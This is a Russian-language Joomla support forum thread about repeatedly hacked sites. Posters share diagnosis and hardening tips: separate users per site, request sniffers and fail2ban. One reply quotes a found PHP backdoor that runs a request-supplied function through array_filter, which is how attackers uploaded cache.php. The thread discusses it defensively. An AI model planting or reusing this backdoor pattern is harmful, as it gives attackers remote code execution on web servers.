Форум русской поддержки Joomla!® CMS
04.12.2016, 01:56:03 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Как понять в чем уязвимость сайта?

 (Прочитано 1412 раз)
0 Пользователей и 1 Гость смотрят эту тему.
mak200
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 47


« : 08.06.2016, 19:23:28 »

Добрый день!
Ищу решение.
Идут регулярные взломы сайта.

Сайт обновляется вовремя.
Пароли сложные, после каждого взлома меняются.
Компьютер с которого работает FTP-клиент проверен на вирусы.
Да и поддержка сказала, что взлом НЕ через FTP или shel.
Все папки имеют права 755, файлы 644.
На сервере сайт не единственный, но взлом происходит через этот, насколько могу судить.

На сайте появляется скрипт cache.php.
Показать текстовый блок

Через него происходит заражение других php файлов.
По времени заражения нашел в логе 4 строчки.
Показать текстовый блок

Кто-то может подсказать в чем уязвимость?
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2650


step by step


« Ответ #1 : 08.06.2016, 19:48:54 »

Я бы не был так уверен, что взлом именно через Joomla .
Что мешает завести отдельный аккаунт для Joomla и тогда уже как бы карантин точно
Из расширений защиты что установлено ? RSFirewall установите
Записан
mak200
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 47


« Ответ #2 : 08.06.2016, 20:12:36 »

Никаких расширений безопасности не установлено.
Второй сайт на аккаунте тоже Joomla.

Есть мысли по поводу строк из лог-файла?
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #3 : 08.06.2016, 20:26:02 »

Никаких расширений безопасности не установлено.
Второй сайт на аккаунте тоже Joomla.

Есть мысли по поводу строк из лог-файла?
Сначала почистите сайт, наведите профилактические меры безопасности и поставте снифер для отловли не GET запросов, там все и прояснится, взломщик полюбому будет пытаться востановить доступ, вот там и выявите уязвимый участок кода.
Записан
mak200
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 47


« Ответ #4 : 08.06.2016, 20:37:29 »

Сначала почистите сайт,

Это сделал.

наведите профилактические меры безопасности

Что имеется в виду?
Мне кажется, что уже все сделал что знал.

и поставте снифер для отловли не GET запросов

Это что такое, расширение какое-то? Первый раз слышу.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #5 : 08.06.2016, 22:14:16 »

Это что такое, расширение какое-то? Первый раз слышу.
Это такой самописный скрипт, который прогружается поверх всех скриптов и ведет свой лог, как общий пример для ознакомления https://forum.antichat.ru/threads/404932/
Записан
voland
Профи
********

Репутация: +487/-86
Online Online

Пол: Мужской
Сообщений: 8694


любит наш народ всякое гавно...


« Ответ #6 : 08.06.2016, 22:23:22 »

А где ж версии и что стоит?
Записан
Филипп Сорокин
Живу я здесь
******

Репутация: +120/-3
Online Online

Пол: Мужской
Сообщений: 1443


« Ответ #7 : 08.06.2016, 22:29:04 »

Это такой самописный скрипт, который прогружается поверх всех скриптов и ведет свой лог, как общий пример для ознакомления https://forum.antichat.ru/threads/404932/
Круто!
Записан
Филипп Сорокин
Живу я здесь
******

Репутация: +120/-3
Online Online

Пол: Мужской
Сообщений: 1443


« Ответ #8 : 08.06.2016, 22:31:56 »

Надо добавить, что сам по себе сниффер бесполезен. А вот если к его логам fail2ban подключить, то это будет очень мощная штука - попытался сделать инъекцию - получил бан!
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3476


skype aqaus.com


« Ответ #9 : 08.06.2016, 22:58:03 »

Версия Joomla какая? Когда была обновлена?
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #10 : 08.06.2016, 23:49:24 »

Надо добавить, что сам по себе сниффер бесполезен. А вот если к его логам fail2ban подключить, то это будет очень мощная штука - попытался сделать инъекцию - получил бан!
Не всегда баном можно защетиться, а вот найти багу и закрыть ее, вот это дело!
Записан
mak200
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 47


« Ответ #11 : 09.06.2016, 01:10:34 »

Joomla!, 3.5.1.
Обновлял до взлома, точно не помню.

Завтра думаю воспроизвести локально свою кмс, со всеми расширениями.
И затем сравнить с сервером на различия файлов.
Записан
finkel
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 2


« Ответ #12 : 28.06.2016, 01:19:12 »

Как успехи? у меня тоже самое на джумлосайте, я обнаружил еще обработку get параметров

Цитировать
IF ($_REQUEST['param1'] && $_REQUEST['param2']) { $f = $_REQUEST['param1']; $p = array( $_REQUEST['param2'); $fp = array_filter($p, $f); echo 'OK'; exit;}

сache.php заливают через это, $f - callback, $p - параметр, но как это попало на сайт, я понять не могу.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #13 : 28.06.2016, 12:57:21 »

Как успехи? у меня тоже самое на джумлосайте, я обнаружил еще обработку get параметров

сache.php заливают через это, $f - callback, $p - параметр, но как это попало на сайт, я понять не могу.
Поподает по средствам взлома, ищите, лечите, устраняйте проблему...

P.S: Тоже интересно, чем дело закончилось у ТС...
Записан
finkel
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 2


« Ответ #14 : 28.06.2016, 17:48:48 »

Поподает по средствам взлома, ищите, лечите, устраняйте проблему...

P.S: Тоже интересно, чем дело закончилось у ТС...

Обновили сайтики и выпилили все бекдоры, ждем.
Самое интересное это как через один сайт все заразили.
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3476


skype aqaus.com


« Ответ #15 : 28.06.2016, 18:19:58 »

Ну вы их хоть разделили? Чтобы опять такого не было.
Записан
Ragivort
Живу я здесь
******

Репутация: +48/-2
Offline Offline

Пол: Мужской
Сообщений: 1005


Есть мечта-стоит жить


« Ответ #16 : 05.07.2016, 13:41:49 »

 
Ну вы их хоть разделили? Чтобы опять такого не было.
Оффтоп мб, но что имеется в виду? Если у меня на VPS много сайтов, их как-то можно разделить? По юзерам? Чтобы они не были в одной папке
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3525


« Ответ #17 : 05.07.2016, 15:46:09 »

Оффтоп мб, но что имеется в виду? Если у меня на VPS много сайтов, их как-то можно разделить? По юзерам? Чтобы они не были в одной папке
Создать отдельного пользователя для каждого сайта, один сайт один пользователь с бд, ftp и прочими доступами. Это самое простое разделение. кол-по пользователей = кол-ву сайтов ну и root (root-а использовать только для настроек vps) и работы вести с каждым сайтом только от имени его пользователя.
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet